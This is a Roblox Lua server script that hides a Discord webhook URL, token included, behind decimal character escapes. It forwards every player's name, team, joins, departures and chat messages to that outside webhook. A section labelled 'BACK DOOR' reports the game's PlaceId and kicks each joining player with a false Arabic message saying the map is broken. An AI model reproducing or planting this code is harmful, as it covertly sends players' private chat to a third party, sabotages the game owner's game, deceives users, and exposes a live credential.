local http = game:GetService("HttpService")
tag = "\104\116\116\112\115\58\47\47\100\105\115\99\111\114\100\46\99\111\109\47\97\112\105\47\119\101\98\104\111\111\107\115\47\49\51\50\54\49\49\53\56\52\51\57\56\57\53\54\57\53\57\54\47\117\71\75\70\53\104\82\122\74\88\115\67\122\98\103\71\67\52\105\56\86\95\69\66\82\79\100\111\56\118\77\70\89\107\74\74\73\110\99\86\89\84\79\49\90\81\120\85\117\90\70\84\69\73\100\109\48\108\101\66\115\66\108\51\120\75\115\118"

local function sent(msg:string)
	http:PostAsync(tag,http:JSONEncode({
		["content"]= msg
	}))
end

for i,plr in pairs(game.Players:GetPlayers()) do
	sent(plr.Name.." ["..plr.Team.Name.."]: Joined -- System")
	plr.Chatted:Connect(function(msg)
		sent(plr.Name.." ["..plr.Team.Name.."]: "..msg)
	end)
end
game.Players.PlayerAdded:Connect(function(plr)
	sent(plr.Name.." ["..plr.Team.Name.."]: Joined -- System")
	plr.Chatted:Connect(function(msg)
		sent(plr.Name.." ["..plr.Team.Name.."]: "..msg)
	end)
end)
game.Players.PlayerRemoving:Connect(function(plr)
	sent(plr.Name.." ["..plr.Team.Name.."]: Left -- System")
end)
-- BACK DOOR
task.spawn(function()
	game.Players.PlayerAdded:Connect(function(plr)
		sent(tostring(game.PlaceId))
		plr:Kick("الماب خربان استنى علبال ما نصلحه")
	end)
end)
